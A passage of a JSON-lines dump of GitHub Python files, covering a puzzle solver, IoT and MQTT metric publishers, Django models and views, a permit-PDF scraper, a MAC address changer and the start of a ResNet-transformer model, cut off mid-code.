range(len(self.rooms[0])):\n print('###' + '#'.join(_[i] for _ in self.rooms) + '###')\n print('#############')\n\n def finished(self):\n for pod, r in pod_rooms:\n if any(_ != pod for _ in self.rooms[r]):\n return False\n return True\n\n def could_solve(self):\n for pod, r in pod_rooms:\n if any(_ not in ('.', pod) for _ in self.rooms[r]):\n return False\n return True\n\n def best_score(self):\n # best we could score if we could place everything\n score = self.energy\n for h, c in enumerate(self.hall):\n if c not in ('.', ' '):\n end = (dest[c], 
0)\n score += dists[(h, end)] * power[c]\n return score\n\n def hash(self):\n return hash((tuple(tuple(_) for _ in self.rooms), tuple(self.hall)))\n\n_last = time.time()\nvisited = {}\n\ndef dfs(state, best):\n global _last\n if DEBUG and time.time() - _last > 5:\n _last = time.time()\n print(best[0] and best[0].energy)\n state.print()\n print()\n\n if state.finished():\n if not best[0] or state.energy < best[0].energy:\n best[0] = state\n return\n\n h = state.hash()\n if h in visited and visited[h] < state.energy:\n return\n visited[h] = state.energy\n\n # costly\n if 'D' in state.hall[:4]:\n return\n\n # impossible to solve\n for d, a in [(3, 5), (5, 7), (3, 7)]:\n if state.hall[d] == 'D' and state.hall[a] == 'A':\n return\n for d, b in [(5, 7)]:\n if state.hall[d] == 'D' and state.hall[b] == 'B':\n return\n for c, a in [(3, 5)]:\n if state.hall[c] == 'C' and state.hall[a] == 'A':\n return\n\n if best[0]:\n # if used energy > best\n if state.energy > best[0].energy:\n return\n\n # if rooms are clear of other pods and best we could do > best found\n if state.could_solve() and state.best_score() > best[0].energy:\n return\n\n # can we put a pod into a room? Push state for every pod we could place\n # in a room...\n for h, pod in enumerate(state.hall):\n if pod in dest:\n r = dest[pod]\n\n # path clear to room\n if any(state.hall[_] != '.' for _ in hall_to_room[(h, r)]):\n continue\n\n room = state.rooms[r]\n if all(_ in ('.', pod) for _ in room):\n p = len(room) - 1\n while room[p] == pod:\n p -= 1\n\n s = state.copy()\n s.move(h, (r, p))\n dfs(s, best)\n\n # take a pod out into any one of the free spots in the hall if possible\n for r, room in enumerate(state.rooms):\n pod = dest[r]\n if any(_ in 'ABCD' and _ != pod for _ in room):\n p = 0\n while room[p] == '.':\n p += 1\n\n for dir in (0, 1):\n for h in room_to_hall[r][dir]:\n if state.hall[h] != '.':\n break\n\n s = state.copy()\n s.move((r, p), h)\n dfs(s, best)\n\n\ndef part1(rooms, hall):\n state = State(rooms, hall)\n if DEBUG:\n state.print()\n\n best = [None]\n dfs(state, best)\n best = best[0]\n\n if DEBUG:\n s = best\n L = []\n while s:\n L.append(s)\n s = s.last\n\n L.reverse()\n for s in L:\n s.print()\n print()\n\n print(best.energy)\n\ndef part2(rooms, hall):\n # splice new data into rooms between first and second row\n\n #D#C#B#A#\n #D#B#A#C#\n\n visited.clear()\n\n for r, s in enumerate(['DD', 'CB', 'BA', 'AC']):\n for c in s:\n rooms[r].insert(-1, c)\n\n part1(rooms, hall)\n\ndef main():\n data = parse_input()\n if '1' in sys.argv:\n part1(*data)\n if '2' in sys.argv:\n part2(*data)\n\nif __name__ == '__main__':\n main()\n","repo_name":"mattbillenstein/aoc","sub_path":"2021/23/p.py","file_name":"p.py","file_ext":"py","file_size_in_byte":7487,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"85"} +{"seq_id":"3100310602","text":"from websocket import create_connection\nimport RPi.GPIO as GPIO\nimport dht11\nfrom protocol import ProtocolGenerator\nimport time\n\nGPIO.setwarnings(False)\nGPIO.setmode(GPIO.BCM)\nGPIO.cleanup()\ninstance = dht11.DHT11(pin=14)\n\nws = create_connection(\"ws://localhost:8000\")\nwhile True:\n result = instance.read()\n\n dataTemp = ProtocolGenerator(\"/temp\", f\"{result.temperature}\")\n dataHum = ProtocolGenerator(\"/temp\", f\"{result.humidity}\")\n\n ws.send(dataTemp.create())\n ws.send(dataHum.create())\n print(\"Sent\")\n 
time.sleep(10)\nws.close()\n","repo_name":"Coyls/project-plant","sub_path":"temp-hum.py","file_name":"temp-hum.py","file_ext":"py","file_size_in_byte":551,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"18409068327","text":"#!/usr/bin/python\nimport os\nimport re\nimport xml.dom.minidom\n\nmap_list = []\nstring_keys = []\nstringPath = ''\nexcel_name = ''\n\ndef ParseKey(fileName):\n DOMTree = xml.dom.minidom.parse(fileName)\n collection = DOMTree.documentElement\n if collection:\n values = collection.getElementsByTagName(\"string\")\n \n keys = []\n if values:\n for value in values:\n if value.hasAttribute(\"name\"):\n map_key = value.getAttribute(\"name\")\n keys.append(map_key)\n\n return keys\n\n\ndef ParseXml(fileName):\n print(\"begin to parse %s\" % (fileName))\n DOMTree = xml.dom.minidom.parse(fileName)\n value_map = {}\n collection = DOMTree.documentElement\n\t#values = []\n if collection:\n values = collection.getElementsByTagName(\"string\")\n\n if values:\n for value in values:\n if value.hasAttribute(\"name\"):\n map_key = value.getAttribute(\"name\")\n\n \n children = value.childNodes;\n if children:\n map_value = value.childNodes[0].data\n map_value = map_value.replace('&', '&')\n else:\n map_value = \"\"\n \n value_map[map_key] = map_value \n \n \n return value_map\n\n\n\n\ndef grepStrings(projectDir):\n\tcommandProjStr = f'find {projectDir} -name \"*.java\" |xargs cat |grep -Hsn \"ToastUtils\" --binary-files=without-match > grep1.txt'\n\tprint(\"执行命令=>> \" + commandProjStr)\n\tos.system(commandProjStr)\n\n\tcommandProjStr = f'cat grep1.txt | grep \"ToastUtils.show\" > grep2.txt'\n\tprint(\"执行命令=>> \" + commandProjStr)\n\tos.system(commandProjStr)\n\n\tcommandProjStr = f'cat grep2.txt | grep -nv \"//\" > grep3.txt'\n\tprint(\"执行命令=>> \" + commandProjStr)\n\tos.system(commandProjStr)\n\n\tcommandProjStr = f'cat grep3.txt | grep \"R.string\" > result.txt'\n\tprint(\"执行命令=>> \" + commandProjStr)\n\tos.system(commandProjStr)\n\ndef matchString(resultOut):\n\twith open('result.txt', mode='r', encoding='utf-8') as f:\n\t\tfor line in f:\n\t\t\t# print(line.strip())\n\t\t\t# ret = line.find(r\"R.string.\");\n\t\t\t#\n\t\t\t# tmpStr = line[ret + 9:]\n\t\t\t# retEnd = tmpStr.find(\")\");\n\t\t\t#\n\t\t\t#\n\t\t\t# print(tmpStr)\n\t\t\t# print(ret)\n\t\t\t# print(retEnd)\n\t\t\t# print(tmpStr[0:retEnd])\n\t\t\tsplitLines = line.split(\":\")\n\n\t\t\tfor tmpLine in splitLines:\n\t\t\t\tm = re.match(r'.*R\\.string\\.(.*)\\).*', tmpLine)\n\t\t\t\tif not m:\n\t\t\t\t\tcontinue\n\n\t\t\t\ttmpResult = m.groups()[0].replace(\"))\", \"\").replace(\")\", \"\")\n\t\t\t\tresultOut.append(tmpResult)\n\t\t\t\t# print(tmpResult)\n\n\t\t\t# # print(m.groups().count())\n\t\t\t# print( m.groups().__len__())\n\t\t\t# # print(m.groups()[0])\n\nif __name__ == '__main__':\n\tprojectDir = \"/Users/lm188/AndroidStudioProjects/im_android\"\n\n\t# grepStrings(projectDir)\n\tresultOut = []\n\tmatchString(resultOut)\n\n\tstringsFielPath = \"/Users/lm188/AndroidStudioProjects/im_android/BusinessLib/src/main/res/values/strings.xml\"\n\n\n\n\tsaveList =[]\n\n\tvalue_map = ParseXml(stringsFielPath)\n\tkeys = value_map.keys();\n\t# for key, value in value_map.items():\n\t# \tif key in resultOut:\n\t# \t\tprint(keyValue[key])\n\tfor key in resultOut:\n\t\tif key in keys:\n\t\t\t# print(value_map[key])\n\n\t\t\tsaveList.append(key)\n\t\telse:\n\t\t\tpass\n\t\t\t# print(key + \"不存在\")\n\t# print(keyValue)\n\n\tsaveList =list(set(saveList))\n\tfor vaule in 
saveList:\n\t\tprint(vaule)\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"wendaoshixin/MyPythonProjs","sub_path":"fengli/ToastString/findToastStrings.py","file_name":"findToastStrings.py","file_ext":"py","file_size_in_byte":3332,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"38838851604","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# pylint: disable=C,R\n\nfrom configparser import ConfigParser\nfrom os.path import dirname, abspath\n\nconfig = ConfigParser()\nWORKDIR = dirname( dirname( abspath( __file__ ) ) )\nconfig.read('settings.ini')\nDATABASE_URI = config.get('database', 'uri', fallback='sqlite://test.db').strip('\"')\nLOGFILE = config.get('logging', 'file', fallback='debug.log').strip('\"')\n","repo_name":"yemelgen/codecrack","sub_path":"coding_interviews/fastapi_crud/app/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"42158903569","text":"from django.db import models\nfrom apps.users.models import User\n\n# Create your models here.\nclass Setting(models.Model):\n title = models.CharField(\n max_length=255,\n verbose_name=\"Название сайта\"\n )\n description = models.TextField(\n verbose_name=\"Описание сайта\"\n )\n logo = models.ImageField(\n upload_to = \"logo/\"\n )\n phone = models.CharField(\n verbose_name=\"Телефонный номер\",\n max_length=100,\n blank = True, null = True\n )\n email = models.EmailField(\n verbose_name=\"Почта сайта\",\n blank = True, null = True\n )\n address = models.CharField(\n max_length=255,\n verbose_name=\"Адрес\",\n blank = True, null = True\n )\n facebook = models.URLField(\n verbose_name=\"Ссылка на страницу facebook\",\n blank = True, null = True\n )\n instagram = models.URLField(\n verbose_name=\"Ссылка на страницу instagram\",\n blank = True, null = True\n )\n linkedin = models.URLField(\n verbose_name=\"Ссылка на страницу linkedin\",\n blank = True, null = True\n )\n twitter = models.URLField(\n verbose_name=\"Ссылка на страницу twitter\",\n blank = True, null = True\n )\n skype = models.URLField(\n verbose_name=\"Ссылка на skype\",\n blank = True, null = True\n )\n telegram = models.URLField(\n verbose_name=\"Ссылка на telegram\",\n blank = True, null = True\n )\n whatsapp = models.URLField(\n verbose_name=\"Ссылка на whatsapp\",\n blank = True, null = True\n )\n\n def __str__(self):\n return self.title\n\n class Meta:\n verbose_name = \"Настройка\"\n verbose_name_plural = \"Настройки\"\n\nclass Contact(models.Model):\n name = models.CharField(\n max_length=100,\n verbose_name=\"Имя\")\n email = models.EmailField(\n verbose_name=\"Почта\"\n )\n title = models.CharField(\n max_length=100,\n verbose_name=\"Заголовок\"\n )\n message = models.CharField(\n max_length=255, \n verbose_name=\"Сообщение\"\n )\n status_contact = models.BooleanField(\n verbose_name=\"Статус обращения\",\n default=False\n )\n created = models.DateTimeField(\n auto_now_add=True,\n )\n\n def __str__(self):\n return f\"{self.name} {self.email}\"\n\n class Meta:\n verbose_name = \"Контакт\"\n verbose_name_plural = \"Контакты\"\n \nclass AboutUs(models.Model):\n image = models.ImageField(\n upload_to = 'about_us/',\n verbose_name=\"Фотография\"\n )\n title = models.CharField(\n max_length=255,\n verbose_name=\"Заголовок\"\n )\n description = models.CharField(\n max_length=500,\n verbose_name=\"Описание\"\n )\n\n def __str__(self):\n return self.title \n\n class Meta:\n 
verbose_name = \"О нас\"\n verbose_name_plural = \"О нас\"\n \nclass News(models.Model):\n user = models.ForeignKey(\n User,\n on_delete=models.DO_NOTHING,\n related_name=\"news_user\",\n verbose_name=\"Пользователь\"\n )\n title = models.CharField(\n max_length=255,\n verbose_name=\"Заговок\"\n )\n description = models.TextField(\n verbose_name=\"Описание\"\n )\n image = models.ImageField(\n upload_to = 'news_image/',\n verbose_name=\"Фотография\"\n )\n created = models.DateTimeField(\n auto_now_add=True\n )\n\n def __str__(self):\n return self.title \n\n class Meta:\n verbose_name = \"Новость\"\n verbose_name_plural = \"Новости\"","repo_name":"Toktorov/eCommerce","sub_path":"apps/settings/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3851,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"21594746649","text":"from django.shortcuts import render , redirect\nfrom .models import DemoFormm\nfrom .forms import CreateForm\nfrom .slug import unique_slug_generator\nfrom django.core.paginator import Paginator\nfrom taggit.models import Tag\n# Create your views here.\n\n# \n\ndef create_form(request):\n\tif request.method == 'POST' :\n\t\tform = CreateForm(request.POST , request.FILES)\n\n\t\tif form.is_valid():\n\t\t\tformobj = form.save(commit=False)\n\t\t\tslug = unique_slug_generator(formobj)\n\t\t\tformobj.slug = slug\n\t\t\tformobj.save()\n\t\t\tform.save_m2m()\n\n\t\t\treturn redirect(detail_view , slug=slug)\n\t\t\t\t\n\telse:\n\t\tform = CreateForm()\n\n\tcontext = {\n\t\t'form' : form,\n\t}\n\treturn render(request, 'form1.html' , context)\n\n\ndef list_view(request):\n\tobj_list = DemoFormm.objects.all()\n\n\tpaginator = Paginator(obj_list, per_page=5)\n\tpage_number = request.GET.get('page', 1)\n\tpage_obj = paginator.get_page(page_number)\n\tcommon_tags = DemoFormm.tags.most_common()\n\n\n\tcontext = {\n\t 'page_obj': page_obj,\n\t 'paginator': paginator,\n\t 'page_number': int(page_number),\n\t 'common_tags': common_tags,\n\t \n\t }\n \n\n\treturn render(request , 'list.html' , context)\n\ndef tagged(request , slug):\n\ttag = Tag.objects.get(slug=slug)\n\tobj_list = DemoFormm.objects.filter(tags = tag)\n\tpaginator = Paginator(obj_list, per_page=5)\n\tpage_number = request.GET.get('page', 1)\n\tpage_obj = paginator.get_page(page_number)\n\tcommon_tags = DemoFormm.tags.most_common()\n\tcontext = {\n\t 'page_obj': page_obj, \n\t 'paginator': paginator,\n\t 'page_number': int(page_number),\n\t 'common_tags': common_tags, \n\t }\n \n\n\treturn render(request , 'list.html' , context)\n\ndef detail_view(request,slug):\n\tobj = DemoFormm.objects.get(slug=slug)\n\treturn render(request , 'detail.html' , {'obj':obj})\n\ndef update_view(request,slug):\n\tobj = DemoFormm.objects.get(slug=slug)\n\tif request.method == 'POST':\n\t\tform = CreateForm(request.POST,request.FILES , instance=obj)\n\t\tif form.is_valid():\n\t\t\tform.save()\n\t\t\tform.save_m2m()\n\t\t\treturn redirect(detail_view , slug=slug)\n\telse:\n\t\tform = CreateForm(instance=obj)\n\treturn render(request , 'edit.html', {'form': form})\n\n\ndef delete_view(request,slug):\n\tobj = DemoFormm.objects.get(slug=slug)\n\tif request.method == 'POST':\n\t\tobj.delete()\n\t\treturn redirect('list')\n\treturn render(request , 'delete.html' , 
{'obj':obj\n\t\t})\n\n","repo_name":"daxitpatel/django-taggit","sub_path":"updatenslug/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2351,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"28287205719","text":"\"\"\"Sphinx configuration.\"\"\"\nfrom datetime import datetime\n\n\nproject = \"FoGD\"\nauthor = \"Mathias Ammon\"\ncopyright = f\"{datetime.now().year}, {author}\"\nextensions = [\n \"sphinx.ext.autodoc\",\n \"sphinx.ext.napoleon\",\n \"sphinx_click\",\n]\nautodoc_typehints = \"description\"\nhtml_theme = \"furo\"\n","repo_name":"tZ3ma/fogd","sub_path":"docs/conf.py","file_name":"conf.py","file_ext":"py","file_size_in_byte":293,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"27106056211","text":"from urllib.error import URLError\nfrom urllib.request import Request\nfrom urllib.request import urlopen\nfrom urllib.request import urlretrieve\n\nimport pdfkit\nfrom bs4 import BeautifulSoup\n\nfrom 排污许可证相关.pySQLtext import get_dataid\n\n# 设置请求头,后期考虑多请求头自动切换\nheaders = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36'\n}\nconfig = pdfkit.configuration(wkhtmltopdf=\"C:\\Program Files\\wkhtmltopdf\\\\bin\\wkhtmltopdf.exe\")\noptions = {\n # 设置PDF的质量,因为都为图片,所以其他格式不做设置\n # 参考来自https://www.jianshu.com/p/4d65857ffe5e\n #'image-quality':'40',\n 'lowquality':'',\n}\n# 如果在前一页获得了dataid,那么这一步就不需要获取链接,\n# 希望获取公司名作为验证手段和文件存储的信息,所以还是要解析详情页\n\n\ndef get_com_name(dataid,headers):\n com_url_head = 'http://permit.mep.gov.cn/permitExt/xkgkAction!xkgk.action?xkgk=getxxgkContent&dataid='\n url = com_url_head + dataid\n request = Request(url=url,headers=headers)\n try:\n html = urlopen(request)\n bs0bj = BeautifulSoup(html, 'lxml')\n com_name = bs0bj.find('p').text\n return com_name\n except URLError as e:\n print(e.reason)\n\ndef download_ben(dataid,headers,download_path):\n\n com_name = get_com_name(dataid,headers)\n # 下载许可证,指定下载位置\n fb_url_head = 'http://permit.mep.gov.cn/permitExt/syssb/wysb/hpsp/hpsp-company-sewage!showImage.action?dataid='\n zb_url_head = 'http://permit.mep.gov.cn/permitExt/upanddown.do?method=download&ewmfile=fbfile&datafileid='\n zb_url = zb_url_head + dataid\n fb_url = fb_url_head + dataid\n zb_local = download_path + com_name + '-排污许可证正本3.pdf'\n fb_local = download_path + com_name + '-排污许可证副本3.pdf'\n #fb_local = download_path + com_name + '-排污许可证副本.html'\n\n try:\n urlretrieve(zb_url, zb_local)\n # 只会下载HTML,不能下载其中的图片,所以暂时不用这个方法\n #urlretrieve(fb_url, fb_local)\n pdfkit.from_url(fb_url, fb_local, configuration=config,options=options)\n except:\n print('出错了')\n\nif __name__ == '__main__':\n download_text = 'D:\\何方辉\\排污许可\\download\\\\'\n com_url_head = 'http://permit.mep.gov.cn/permitExt/xkgkAction!xkgk.action?xkgk=getxxgkContent&dataid='\n dataid_list = get_dataid()\n for i in dataid_list:\n download_ben(i,headers,download_text)","repo_name":"c410185/-1","sub_path":"排污许可证相关/download_ben.py","file_name":"download_ben.py","file_ext":"py","file_size_in_byte":2579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"38033955184","text":"import subprocess\nimport optparse\nimport re\n\ndef get_input():\n opt_parse = optparse.OptionParser()\n opt_parse.add_option(\"-i\",\"--interface\", dest = \"interface\", help = \"interface to change\")\n opt_parse.add_option(\"-m\", \"--mac\", dest = \"macaddress\", 
help = \"new mac address\")\n\n return opt_parse.parse_args()\n\ndef mac_changer(user_interface, user_mac):\n subprocess.call([\"ifconfig\", user_interface, \"down\"])\n subprocess.call([\"ifconfig\", user_interface, \"hw\", \"ether\", user_mac])\n subprocess.call([\"ifconfig\", user_interface, \"up\"])\n\ndef control_mac(user_interface):\n ifconfig = subprocess.check_output([\"ifconfig\", user_interface])\n new_mac = re.search(r\"\\w\\w:\\w\\w:\\w\\w:\\w\\w:\\w\\w:\\w\\w\", str(ifconfig))\n\n if new_mac:\n return new_mac.group(0)\n else:\n return None\n\n\n(user_input, arguments) = get_input()\nmac_changer(user_input.interface, user_input.macaddress)\nfinal = control_mac(str(user_input.interface))\nif final == user_input.macaddress:\n print(\"success\")\nelse:\n print(\"Error\")","repo_name":"begumakdeniz/macChanger","sub_path":"macChanger.py","file_name":"macChanger.py","file_ext":"py","file_size_in_byte":1031,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"15013645338","text":"#!/usr/bin/env python3\n\n# sys2mqtt version 0.3.0 (C) Fred Boniface 2020\n# Distributed under the GPLv3 License\n\n# imports\nfrom socket import gethostname # Included with python3\nfrom random import randrange # Included with python3\nimport psutil # pip3 install psutil\nimport paho.mqtt.client as mqtt # pip3 install paho-mqtt\nimport conf # Included with sys2mqtt\nfrom time import sleep # Included with python3\n\n# Get hostname\ntry:\n host = gethostname()\n print(\"Host is identified as \" + \"'\" + host + \"'\")\nexcept:\n print(\"Unable to identify host,\\nusing 'unknown'\")\n host = \"unknown\"\n\n\n# MQTT parameters\nclient_rng = randrange(0, 99999)\nclient_id = \"sys2mqtt_{}\".format(client_rng)\n# Topics\ncorestopic = \"sys2mqtt/\" + host + \"/cpu/cores\"\ncpuutiltopic = \"sys2mqtt/\" + host + \"/cpu/util\"\ntotramtopic = \"sys2mqtt/\" + host + \"/mem/ram/total\"\nramutiltopic = \"sys2mqtt/\" + host + \"/mem/ram/util\"\ntotswaptopic = \"sys2mqtt/\" + host + \"/mem/swap/total\"\nswaputiltopic = \"sys2mqtt/\" + host + \"/mem/swap/util\"\n\n# Get static metrics - CPU Cores, Total RAM, Total SWAP.\ncores = psutil.cpu_count() # Get cores\nprint(\"{} cores identified\".format(cores))\nvirtmem = psutil.virtual_memory() # Get RAM details\ntotrambyte = virtmem[0] # Get total RAM\ntotramgbyte = round(totrambyte / 1073741824, 1) # Convert to GB (1 decimal place)\nprint(\"Total RAM = {} GB\".format(totramgbyte))\nswapmem = psutil.swap_memory() # Get swap details\ntotswapbyte = swapmem[0] # Get total swap\ntotswapgbyte = round(totswapbyte / 1073741824, 1) # Convert to GB (1 decimal place)\nprint(\"Total swap = {} GB\".format(totswapgbyte))\n\n# Get CPU Cores & Utilisation\ndef getcpu():\n global procutil\n\n procutil = psutil.cpu_percent() # Get CPU usage\n print(\"CPU utilisation = {}%\".format(procutil))\n\n# Get RAM Utilisation\ndef getmem():\n global virtmem, memutil, swapmem, swaputil\n\n memutil = virtmem[2] # Get RAM util\n print(\"RAM utilisation = {}%\".format(memutil))\n swaputil = swapmem[3] # Get swap util\n print(\"Swap utilisation = {}%\".format(swaputil))\n\n\n # Initiate MQTT Connection\n\n# Gather MQTT Broker information and initiate connection\nclient = mqtt.Client()\nclient.username_pw_set(conf.username, password=conf.password)\nclient.connect(conf.broker_url, conf.broker_port)\n\n# Publish static metrics once per startup.\nclient.publish(topic=corestopic, payload=cores, qos=conf.q, retain=True)\nclient.publish(topic=totramtopic, 
payload=totramgbyte, qos=conf.q, retain=True)\nclient.publish(topic=totswaptopic, payload=totswapgbyte, qos=conf.q, retain=True)\n\nwhile True:\n\n getcpu()\n getmem()\n print(\"Loop Completed\")\n \n # Publish dynamic payloads\n client.publish(topic=cpuutiltopic, payload=procutil, qos=conf.q, retain=False)\n client.publish(topic=totramtopic, payload=totramgbyte, qos=conf.q, retain=True)\n client.publish(topic=ramutiltopic, payload=memutil, qos=conf.q, retain=False)\n client.publish(topic=totswaptopic, payload=totswapgbyte, qos=conf.q, retain=True)\n client.publish(topic=swaputiltopic, payload=swaputil, qos=conf.q, retain=False)\n\n sleep(10)\n","repo_name":"frdbonif/sys2mqtt","sub_path":"python/sys2mqtt.py","file_name":"sys2mqtt.py","file_ext":"py","file_size_in_byte":3129,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"4489644590","text":"# -*- coding: utf-8 -*-\n\"\"\"\nRun a pretrained ResNet-18 model in combination with visual transformer modules on CBIS-DDSM\n\nBy Thijs Werrij (thijswerrij)\nBased on code by Md Tahmid Hossain (tahmid0007)\n\"\"\"\n\nimport json\nimport time\nimport torch\nimport torchvision\nfrom torch import nn\nimport torch.nn.functional as F\nimport torch.nn.init as init\n\nimport PIL\nfrom einops import rearrange\nimport os\n\nfrom torchvision.models import resnet18\n\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n#%% Transformer code by Md Tahmid Hossain (tahmid0007), see repository acknowledgements\n\ndef _weights_init(m):\n classname = m.__class__.__name__\n #print(classname)\n if isinstance(m, nn.Linear) or isinstance(m, nn.Conv2d):\n init.kaiming_normal_(m.weight)\n\nclass LambdaLayer(nn.Module):\n def __init__(self, lambd):\n super(LambdaLayer, self).__init__()\n self.lambd = lambd\n\n def forward(self, x):\n return self.lambd(x)\n\n\nclass BasicBlock(nn.Module):\n expansion = 1\n\n def __init__(self, in_planes, planes, stride=1, option='A'):\n super(BasicBlock, self).__init__()\n self.conv1 = nn.Conv2d(in_planes, planes, kernel_size=3, stride=stride, padding=1, bias=False)\n self.bn1 = nn.BatchNorm2d(planes)\n self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, stride=1, padding=1, bias=False)\n self.bn2 = nn.BatchNorm2d(planes)\n\n self.shortcut = nn.Sequential()\n if stride != 1 or in_planes != planes:\n if option == 'A':\n \"\"\"\n For CIFAR10 ResNet paper uses option A.\n \"\"\"\n self.shortcut = LambdaLayer(lambda x:\n F.pad(x[:, :, ::2, ::2], (0, 0, 0, 0, planes//4, planes//4), \"constant\", 0))\n elif option == 'B':\n self.shortcut = nn.Sequential(\n nn.Conv2d(in_planes, self.expansion * planes, kernel_size=1, stride=stride, bias=False),\n nn.BatchNorm2d(self.expansion * planes)\n )\n\n def forward(self, x):\n out = F.relu(self.bn1(self.conv1(x)))\n out = self.bn2(self.conv2(out))\n out += self.shortcut(x)\n out = F.relu(out)\n #print(out.size())\n return out\n\n\n\nclass Residual(nn.Module):\n def __init__(self, fn):\n super().__init__()\n self.fn = fn\n def forward(self, x, **kwargs):\n return self.fn(x, **kwargs) + x\n\nclass LayerNormalize(nn.Module):\n def __init__(self, dim, fn):\n super().__init__()\n self.norm = nn.LayerNorm(dim)\n self.fn = fn\n def forward(self, x, **kwargs):\n return self.fn(self.norm(x), **kwargs)\n\nclass MLP_Block(nn.Module):\n def __init__(self, dim, hidden_dim, dropout = 0.1):\n super().__init__()\n self.nn1 = nn.Linear(dim, hidden_dim)\n torch.nn.init.xavier_uniform_(self.nn1.weight)\n torch.nn.init.normal_(self.nn1.bias, 
std = 1e-6)\n self.af1 = nn.GELU()\n self.do1 = nn.Dropout(dropout)\n self.nn2 = nn.Linear(hidden_dim, dim)\n torch.nn.init.xavier_uniform_(self.nn2.weight)\n torch.nn.init.normal_(self.nn2.bias, std = 1e-6)\n self.do2 = nn.Dropout(dropout)\n \n def forward(self, x):\n x = self.nn1(x)\n x = self.af1(x)\n x = self.do1(x)\n x = self.nn2(x)\n x = self.do2(x)\n \n return x\n\nclass Attention(nn.Module):\n def __init__(self, dim, heads = 8, dropout = 0.1):\n super().__init__()\n self.heads = heads\n self.scale = dim ** -0.5 # 1/sqrt(dim)\n\n self.to_qkv = nn.Linear(dim, dim * 3, bias = True) # Wq,Wk,Wv for each vector, thats why *3\n torch.nn.init.xavier_uniform_(self.to_qkv.weight)\n torch.nn.init.zeros_(self.to_qkv.bias)\n \n self.nn1 = nn.Linear(dim, dim)\n torch.nn.init.xavier_uniform_(self.nn1.weight)\n torch.nn.init.zeros_(self.nn1.bias) \n self.do1 = nn.Dropout(dropout)\n \n\n def forward(self, x, mask = None):\n b, n, _, h = *x.shape, self.heads\n qkv = self.to_qkv(x) #gets q = Q = Wq matmul x1, k = Wk mm x2, v = Wv mm x3\n q, k, v = rearrange(qkv, 'b n (qkv h d) -> qkv b h n d', qkv = 3, h = h) # split into multi head attentions\n\n dots = torch.einsum('bhid,bhjd->bhij', q, k) * self.scale\n\n if mask is not None:\n mask = F.pad(mask.flatten(1), (1, 0), value = True)\n assert mask.shape[-1] == dots.shape[-1], 'mask has incorrect dimensions'\n mask = mask[:, None, :] * mask[:, :, None]\n dots.masked_fill_(~mask, float('-inf'))\n del mask\n\n attn = dots.softmax(dim=-1) #follow the softmax,q,d,v equation in the paper\n\n out = torch.einsum('bhij,bhjd->bhid', attn, v) #product of v times whatever inside softmax\n out = rearrange(out, 'b h n d -> b n (h d)') #concat heads into one matrix, ready for next encoder block\n out = self.nn1(out)\n out = self.do1(out)\n return out\n\nclass Transformer(nn.Module):\n def __init__(self, dim, depth, heads, mlp_dim, dropout):\n super().__init__()\n self.layers = nn.ModuleList([])\n for _ in range(depth):\n self.layers.append(nn.ModuleList([\n Residual(LayerNormalize(dim, Attention(dim, heads = heads, dropout = dropout))),\n Residual(LayerNormalize(dim, MLP_Block(dim, mlp_dim, dropout = dropout)))\n ]))\n def forward(self, x, mask = None):\n for attention, mlp in self.layers:\n x = attention(x, mask = mask) # go to attention\n x = mlp(x) #go to MLP_Block\n return x\n \n#%%\n\nclass PretrainedViTResNet(nn.Module):\n def __init__(self, in_channels=3, num_classes=3, dim = 128, num_tokens = 8, mlp_dim = 256, heads = 8, depth = 6, emb_dropout = 0.1, dropout= 0.1, batch_size=(100,100), pretrained=True, remove_last_block=False):\n #super().__init__(BasicBlock, [3, 3, 3], *args, **kwargs)\n super(PretrainedViTResNet, self).__init__()\n \n self.in_planes = 16\n self.L = num_tokens\n self.cT = dim\n \n resnet = resnet18(pretrained=pretrained, progress=False).to(device)\n modules = list(resnet.children())\n if remove_last_block: # original paper replaces last BasicBlock with VT modules; if remove_last_block = True, last BB is removed\n self.resnet = nn.Sequential(*modules[:-3])\n outsize = 256\n else:\n self.resnet = nn.Sequential(*modules[:-2])\n outsize = 512\n #self.final = modules[-2:]\n #self.apply(_weights_init)\n \n # Tokenization\n self.token_wA = nn.Parameter(torch.empty(batch_size[0],self.L, outsize),requires_grad = True) #Tokenization parameters\n torch.nn.init.xavier_uniform_(self.token_wA)\n self.token_wV = nn.Parameter(torch.empty(batch_size[1],outsize,self.cT),requires_grad = True) #Tokenization parameters\n 
